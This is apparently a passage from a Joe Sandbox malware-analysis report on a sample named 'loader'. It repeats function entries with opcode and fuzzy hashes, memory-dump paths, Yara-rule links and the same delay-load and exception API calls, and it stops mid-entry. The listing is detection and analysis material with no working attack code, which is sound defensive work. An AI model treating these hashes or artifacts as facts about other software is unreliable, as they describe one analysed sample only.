              • Opcode ID: 93353cba60f8f6b192382259fe03a3371d0845dc74c5ef8e64e0a95e7ec35c3b
              • Instruction ID: f5641a7b956049978945a733bd1d01f5f46ca8618a46f06f1888dcf78803a5f9
              • Opcode Fuzzy Hash: 93353cba60f8f6b192382259fe03a3371d0845dc74c5ef8e64e0a95e7ec35c3b
              • Instruction Fuzzy Hash: 2AB012A126D5026DB14C62447D42D76020DC5C2B10771413AF10AE00C0F7505CC60431
              Function 0011D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a2c58f0e17cd27d7935200ff80f2168721d6eb2d4d28049de778d686992a6621
              • Instruction ID: e21b08731cfc0dc7f15aeb92489debb998052dd7d03bbc4f251116f3116dd09a
              • Opcode Fuzzy Hash: a2c58f0e17cd27d7935200ff80f2168721d6eb2d4d28049de778d686992a6621
              • Instruction Fuzzy Hash: 30B0129126D4026CB10C61447D42D76020DC5C3B10770803AF50AE00C0F7505C860431
              Function 0011D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ae5148b0b91959195fdf4423cbd7cb87129d50bb9ade18f70ee6f12db2b6d06b
              • Instruction ID: b2ac505b363af2e7e474d09843f71c8108ea756297120d13480fc36f07741f76
              • Opcode Fuzzy Hash: ae5148b0b91959195fdf4423cbd7cb87129d50bb9ade18f70ee6f12db2b6d06b
              • Instruction Fuzzy Hash: 60B0129127D4026CB10C61447D42D76024DC9C2B10770403AF10AE00C0F7505C860431
              Function 0011D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c9dc0ed3ab8abc09299135d0c7026b9398d6a7a45b0fec392068723bc2b2e96d
              • Instruction ID: 1a446b33f25b9f9b3ea34da22e904333ebad005dd647faa07a900b337e330077
              • Opcode Fuzzy Hash: c9dc0ed3ab8abc09299135d0c7026b9398d6a7a45b0fec392068723bc2b2e96d
              • Instruction Fuzzy Hash: B3B012D126D4026CB10C61547D42D76024CC4C3B10371C03AF60AE00C0F7509CC60431
              Function 0011D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0d1724b9a73d6e6c6c86e788562b0e09ad2e28b372106c8698807c5361f426b1
              • Instruction ID: ef15d8f4086031eba2ff08f0ccdfb8319eafdfc311ef25e88dde85b7179b1fea
              • Opcode Fuzzy Hash: 0d1724b9a73d6e6c6c86e788562b0e09ad2e28b372106c8698807c5361f426b1
              • Instruction Fuzzy Hash: F3B012E126D4026CB10C61447E42D76028CC4C3B10770803AF10AE00C0F7505DC70431
              Function 0011DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 50844b8bff5c72e80f16365cc907f6fb950e7260aa00a383e849058cd10d9bdc
              • Instruction ID: dd8a87da77d2daac5f5d70d02baff653adf0398bdaba4463d3b7791bc3809844
              • Opcode Fuzzy Hash: 50844b8bff5c72e80f16365cc907f6fb950e7260aa00a383e849058cd10d9bdc
              • Instruction Fuzzy Hash: 31B0129126C0026CB10CB1457E12E7F024CC4C4B14330853BF10DE1044E7504C8B4432
              Function 0011DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b877c337b23af4e4e4798b1a2f72c1241e234a6475b798f9b9479386c139a24b
              • Instruction ID: a97ac234fdd1b32d0f3648a29bd46d6396188f6b6ac2c0e7faf22a7f66b14814
              • Opcode Fuzzy Hash: b877c337b23af4e4e4798b1a2f72c1241e234a6475b798f9b9479386c139a24b
              • Instruction Fuzzy Hash: D5B012A126D002ECB10CB1457D12D7B024CC4C0B10330C13BF40DD1084E7544D8A4432
              Function 0011DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bf6fc9335ecc201f18d0e77fa1d44a478ca58fc390a90bbb4a72cdb0e1673c27
              • Instruction ID: dbdac48488b02f2e4b11405557d6a0dd232075411739ff1e8277d2bdb8533065
              • Opcode Fuzzy Hash: bf6fc9335ecc201f18d0e77fa1d44a478ca58fc390a90bbb4a72cdb0e1673c27
              • Instruction Fuzzy Hash: 94B012912AC1026CF10CB1457D52E7B024CD4C0B10330413BF00DD1044E7504C864532
              Function 0011DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ada8c55a9645e8f16a999a519d7586f2522cbf8cccd903ca56bc9d0e16de4dd9
              • Instruction ID: 1d259d5e0da615f5e20c1ac7cf7435e113905e607fbe34564966e2806170666b
              • Opcode Fuzzy Hash: ada8c55a9645e8f16a999a519d7586f2522cbf8cccd903ca56bc9d0e16de4dd9
              • Instruction Fuzzy Hash: 81B0129636C0026CB10C511C3D07EB6021CD0C1B10331403AF10BE0040EB504C8A4031
              Function 0011DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: de026a2fdf0467e46bd938f7b7c20f228d554ee278c104457faf3d0f67e8a379
              • Instruction ID: ea96e92c80024eb412fce1a2193c2f620b23884e9ac5c86a56acbea81628da79
              • Opcode Fuzzy Hash: de026a2fdf0467e46bd938f7b7c20f228d554ee278c104457faf3d0f67e8a379
              • Instruction Fuzzy Hash: 0EB0129637C1077CB20C11083D07CB7021CC0C1B10332413AF106F0040EB944CCA4031
              Function 0011DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1db345e5bc47aa01b036141edf75ab7cfa0fcb3f3aa93ae036b29806c9d29e9a
              • Instruction ID: b1c27615aac8116cc4e5bee78e7750556e61f1bb0e5dc6a190f5b887d171ef99
              • Opcode Fuzzy Hash: 1db345e5bc47aa01b036141edf75ab7cfa0fcb3f3aa93ae036b29806c9d29e9a
              • Instruction Fuzzy Hash: 7AB0129636C0037CB10C510C3E07DB7021CC0C1B10332803AF20AE0040EB944C874031
              Function 0011DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e22ad16179c8e57bc37a2986149f91f344bb6f80308d3fff2990d7f6845be979
              • Instruction ID: 9d42c1b6f4b9634df75921da51a42b5f3d1e058ecb1c3e7c4533df45d252857b
              • Opcode Fuzzy Hash: e22ad16179c8e57bc37a2986149f91f344bb6f80308d3fff2990d7f6845be979
              • Instruction Fuzzy Hash: 92B0129636C003ACB10C510C3D07DB7022CC0C1B10332813AF50AE1080EB944C8A4031
              Function 0011DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 21e1d02070497de4743e61b46cdd7c6d2946f501c38c80c80e865cd340915293
              • Instruction ID: e63b8c8bf009febb9fa3cebe54b892206cc7292f113ef15805569d3c08f3ccb6
              • Opcode Fuzzy Hash: 21e1d02070497de4743e61b46cdd7c6d2946f501c38c80c80e865cd340915293
              • Instruction Fuzzy Hash: 30B0129626C2027DF10C21047F02EB6022CC1C1B203314A3EF209F0040E7805CC65431
              Function 0011DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 005d5c42a484b64c1476da71f0e5bc140c5c342f70e5652c1463e67ab49349b1
              • Instruction ID: 4ed88aaf36276c21ea554294f13b5a8c8cdc5cb4e05042dc5493ca3da31606d5
              • Opcode Fuzzy Hash: 005d5c42a484b64c1476da71f0e5bc140c5c342f70e5652c1463e67ab49349b1
              • Instruction Fuzzy Hash: 4BB0129626C1026CF10C61087D02FB6022CC0C6B20330893EF60DE0080E7805C864431
              Function 0011DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f01cf74a85a77a729ab97fe27c8e1bc8e7e0412558a880031632f200cdff2428
              • Instruction ID: 3870883f4c7a04e2706f657b33f96c3e1f7c86c5ac9a794f15f930bdf7645ec0
              • Opcode Fuzzy Hash: f01cf74a85a77a729ab97fe27c8e1bc8e7e0412558a880031632f200cdff2428
              • Instruction Fuzzy Hash: 0AB0129627C2026CF10C61087D02FB6022CC0C1B20330493FF20DE0040E7805C864431
              Function 0011D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7eb1cf15feb423763ee6712b4006696e75406bb2759b7c3a45406b350e265426
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 7eb1cf15feb423763ee6712b4006696e75406bb2759b7c3a45406b350e265426
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
